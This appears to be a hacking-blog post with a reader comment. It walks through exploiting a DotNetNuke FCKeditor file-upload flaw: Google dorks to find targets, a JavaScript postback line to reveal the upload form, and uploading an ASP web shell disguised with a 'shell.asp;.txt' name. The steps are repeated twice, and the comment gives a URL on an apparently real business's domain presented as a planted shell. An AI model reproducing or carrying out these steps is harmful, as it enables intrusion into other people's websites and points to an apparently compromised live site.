DNN stands for Dot Net Nuke. It have an Remote Arbitrary File Upload vulnerability. Simply said uploading vulnerability.
inurl:/fck/fcklinkgallery.aspx
inurl:/tabid/36/language/en-US/Default.aspx
I got a target,
Select "File" from list.
The in URL bar paste the JavaScript: javascript:__doPostBack('ctlURL$cmdUpload','')
Now there appear a UPLOADING bar on page.
Now upload your ASP shell as "shell.asp;.txt, shell.asp;.jpg,etc"
Your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt"
<<<<<<<<<<<<<<<<--------------------HOPE YOUR COMMENT---------------------->>>>>>>>>>>
Finding vulnerable websites
Find vulnerable websites by GOOGLE dorks:inurl:/fck/fcklinkgallery.aspx
inurl:/tabid/36/language/en-US/Default.aspx
I got a target,
Select "File" from list.
The in URL bar paste the JavaScript: javascript:__doPostBack('ctlURL$cmdUpload','')
Now there appear a UPLOADING bar on page.
Now upload your ASP shell as "shell.asp;.txt, shell.asp;.jpg,etc"
Your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt"
<<<<<<<<<<<<<<<<--------------------HOPE YOUR COMMENT---------------------->>>>>>>>>>>
1 comments :
Write commentsGuyzzz find uploaded shell at http://www.target.com/Portals/0/shell.asp;.txt
Replymy sh3ll: http://ealimited.com.au/Portals/0/terminal.asp;.txt